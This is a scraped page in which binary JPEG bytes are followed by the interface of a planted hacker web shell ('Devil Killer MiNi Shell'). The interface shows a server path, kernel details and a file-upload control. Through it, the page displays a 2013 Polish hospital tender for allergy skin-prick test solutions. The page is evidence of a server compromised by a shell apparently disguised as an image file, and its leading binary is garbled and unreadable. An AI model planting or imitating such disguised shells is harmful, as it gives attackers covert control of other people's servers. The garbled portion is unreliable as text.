JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131031/229501-N-2013.html

<p class="kh_header"><b>Łódź: 138/ZP/13
	Postępowanieo udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości powyżej 14 000 euro, nie przekraczającej 200 000 euro na dostawy testów alergologicznych dla WSS im. M. Kopernika w Łodzi.</b><br>
<b>Numer ogłoszenia: 229501 - 2013; data zamieszczenia: 31.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Mikołaja Kopernika , ul. Pabianicka 62, 93-513 Łódź, woj. łódzkie, tel. 042 6895910, 6895912, faks 042 6895911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 138/ZP/13
	Postępowanieo udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości powyżej 14 000 euro, nie przekraczającej 200 000 euro na dostawy testów alergologicznych dla WSS im. M. Kopernika w Łodzi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są dostawy testów alergologicznych dla WSS im. M. Kopernika w Łodzi.
2.	Przedmiot zamówienia został podzielony na 3 pakiety.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna posiadanie koncesji/ zezwolenia na prowadzenie hurtowni farmaceutycznej oraz obrót środkami odurzającymi i psychotropowymi</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania  warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania  warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania  warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania  warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt. a), zastępuje się je dokumentem oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednia datą wymagana dla tych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W trakcie obowiązywania umowy strony dopuszczają zmiany cen produktów farmaceutycznych będących przedmiotem umowy wyłącznie w przypadkach:
a.zmiany stawki podatku VAT, przy czym w razie obniżenia stawki podatku VAT automatycznemu obniżeniu ulega cena brutto, natomiast cena netto pozostaje bez zmian, a w razie podwyższenia stawki podatku VAT strony mogą zawrzeć aneks mocą którego nastąpi podwyższenie ceny brutto przy pozostawieniu ceny netto bez zmian. Zmieniona stawka podatku VAT obowiązuje strony od dnia wejścia w życie odpowiednich przepisów prawa natomiast podwyższona cena brutto od dnia zawarcia aneksu, chyba że strony postanowią inaczej
b.zmiany cen urzędowych leków, w tym cen zbytu produktów farmaceutycznych stanowiących podstawę limitu w danej grupie limitowej, w granicach obniżenia lub podwyższenia  cen
c.wydania decyzji administracyjnej o objęciu produktu farmaceutycznego refundacją lub zmiany tej decyzji  a także zmiany poziomu refundacji leków, 
d.zmiany produktu farmaceutycznego stanowiącego podstawę limitu w danej grupie limitowej,
e.pogorszenia relacji PLN w stosunku do  waluty obcej EURO, USD lub CHF  mającej wpływ na cenę przedmiotu zamówienia o więcej niż 20% w stosunku do wartości kursu z dnia złożenia oferty przez Wykonawcę w sytuacji gdy przedstawi  on Zamawiającemu dokumenty wskazujące jednoznacznie na związek przyczynowo skutkowy pomiędzy zmianą kursu waluty, a bezpośrednimi, zwiększonymi kosztami które musi ponieść Wykonawca realizując przedmiot umowy;
f .zmiany cen na korzyść Zamawiającego.
2.Zmiany cen, o których mowa w ust. 1, za wyjątkiem następujących automatycznie zmian: zmiany, która jest wynikiem obniżenia stawki podatku VAT oraz zmiany, która jest wynikiem obniżenia poziomu refundacji skutkującego obniżeniem ceny na korzyść Zamawiającego, mogą nastąpić jedynie na mocy pisemnego aneksu podpisanego przez obie strony umowy. Brak dojścia stron do porozumienia w terminie 30 dni od daty otrzymania przez jedną ze stron uzasadnionej, pisemnej propozycji od drugiej strony w sprawie zawarcia aneksu zmieniającego cenę (ceny), upoważnia Zamawiającego do rozwiązania umowy ze skutkiem natychmiastowym, w całości lub w części, bez prawa Wykonawcy do jakichkolwiek roszczeń z tego tytułu.  Tam gdzie zmiana następuje automatycznie, strony mogą zawrzeć aneks porządkujący, określający nową wysokość ceny.
3. O propozycji zmiany cen produktów farmaceutycznych, o której mowa w ust. 1 strona zainteresowana zmianą winna pisemnie poinformować drugą stronę załączając stosowny projekt aneksu, wraz z uzasadnieniem, o którym mowa w ust. 2  obejmujący propozycje nowych cen wraz z wykazem produktów farmaceutycznych, których te zmiany będą dotyczyć, wyznaczając stosowny termin do akceptacji zmian, nie krótszy jednak niż 30 dniowy od otrzymania uzasadnionej, pisemnej propozycji przez drugą stronę.
4.Ponadto Zamawiający zastrzega sobie prawo do zmiany treści istotnych postanowień umowy na zasadach określonych w art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, a Wykonawca wyraża na to zgodę, w następujących przypadkach:
a.wydłużenia okresu trwania umowy na czas określony do 1 roku, z tym zastrzeżeniem iż łączny okres obowiązywania umowy nie może trwać dłużej niż 4 lata -w przypadku niewyczerpania całości asortymentu określonego w Załączniku nr 1 w terminie na jaki umowa została zawarta, przy zachowaniu ogólnej wartości brutto umowy bez zmian
b.zmiany wielkości opakowania, dawki lub postaci w uzasadnionych przypadkach,  na przykład w sytuacji wprowadzenia przez producenta/producentów danego produktu innych niż wskazane w załączniku do umowy opakowania, dawki lub postaci lub   w innym uzasadnionym przypadku, z zachowaniem zasady proporcjonalności     w stosunku do ceny objętej umową, pod warunkiem uprzedniego wyrażenia zgody przez Kierownika Apteki Szpitalnej, na czas ustalony z Kierownikiem Apteki Szpitalnej, jeżeli zmiana ta będzie wprowadzona na czas dłuższy niż 30 dni,
c.wprowadzenia w miejsce produktu wskazanego w załączniku nr 1 do umowy odpowiednika chemicznego tego samego lub  innego producenta po cenie nie wyższej niż cena zawarta w umowie za dany produkt, w wypadku gdy będzie                     to uzasadnione:
-potrzebami terapeutycznymi; lub
-brakiem produktu w oryginalnym opakowaniu, dawce lub postaci, lub
-zmianami na listach refundacyjnych, lub
-zmianą produktu farmaceutycznego stanowiącego podstawę limitu w danej grupie limitowej.
d.zmianę ilości poszczególnych pozycji w pakietach w sytuacji gdy:
-nastąpi zmiana w zakresie liczby pacjentów korzystających ze świadczeń zdrowotnych Zamawiającego, bądź
-wymagać tego będzie prawidłowa realizacja przez Zamawiającego zadań polegających na wykonywaniu świadczeń zdrowotnych, bądź
-w wyniku zmiany prawa możliwe będzie dzięki temu podniesienie poziomu/jakości świadczeń wykonywanych przez Zamawiającego, bądź;
-w innych sytuacjach uzasadnionych wykonywaną przez Zamawiającego działalnością medyczną
e.wprowadzenia na rynek nowego, tańszego zamiennika produktu farmaceutycznego. Wówczas Zamawiający ma prawo zażądać zmiany zaproponowanego  w ofercie produktu farmaceutycznego na nowy, tańszy zamiennik, a w przypadku odmowy Wykonawcy Zamawiający ma prawo skorzystać z uprawnień określonych w § 7 ust. 2 zdanie drugie, stosowanym odpowiednio.
5.Zmiana istotnych postanowień umowy, o których mowa w ust. 4, wymaga zgody obu stron umowy wyrażonej w formie pisemnej pod rygorem nieważności aneks do umowy.
6.W przypadku konieczności zmiany wielkości opakowania, dawki lub postaci, w okresie krótszym niż 30 dni, w sytuacji gdy zmiana taka będzie spowodowana zmianami u  producenta danego produktu lub inną pilną i zasadną potrzebą, strony dopuszczają wprowadzenie takiej zmiany, bez konieczności podpisywania aneksu, jednakże na pisemny wniosek Kierownika Apteki Szpitalnej lub po uzyskaniu pisemnej zgody Kierownika Apteki Szpitalnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopernik.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny
im. M. Kopernika w Łodzi
ul. Pabianicka 62
93 - 513 Łódź

Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2013 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny
im. M. Kopernika w Łodzi
ul. Pabianicka 62
93 - 513 Łódź

Kancelaria Szpitala.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kontrola ujemna 	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
2	Histamina 	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
3	Trawy/ zboża	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
4	Roztocza - D. Farinae	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
5	Roztocza D. Pteronyssinus	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
6	Tymotka łąkowa	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
7	Kupkówka pospolita	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
8	Żyto	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
9	Olcha	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
10	Leszczyna	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
11	Brzoza	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
12	Babka lancetowata	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
13	Bylica	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
14	Alternaria tenuis	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
15	Cladosporium herbarum	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
16	Sierść konia	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
17	Wieprzowina	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
18	Mięso kurze	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
19	Dorsz	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
20	Mąka pszenna	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
21	Mleko krowie	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
22	Jajko całe	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
23	Żółtko	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
24	Białko jaja	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
25	Seler	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
26	Ziemniak	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
27	Kalafior	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
28	Pietruszka	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
29	Papryka	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
30	Pomarańcza	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
31	Banan	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
32	Orzech laskowy	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
33	Orzeszki ziemne	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
34	Orzech włoski	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
35	Pomidor	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
36	Mięso indycze	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
37	Mąka kukurydziana	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
38	Mąka żytnia	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
39	Penicyllium notatum	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
40	Aspergillus fumigatus	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
41	Sierść chomika	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
42	Sierść świnki morskiej	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op
43	Sierść królika	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Soja	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op	9
2	Marchew	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op	8
3	Curry	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op	10
4	Owoce cytrusowe	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op	19
5	Wełna owcy	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op	4
6	Pióra papugi	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op	8
7	Kakao	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op	12
8	Jabłko	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op	12
9	Truskawka	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op	12
10	Cytryna	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op	12
11	Sierść psa	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op	19
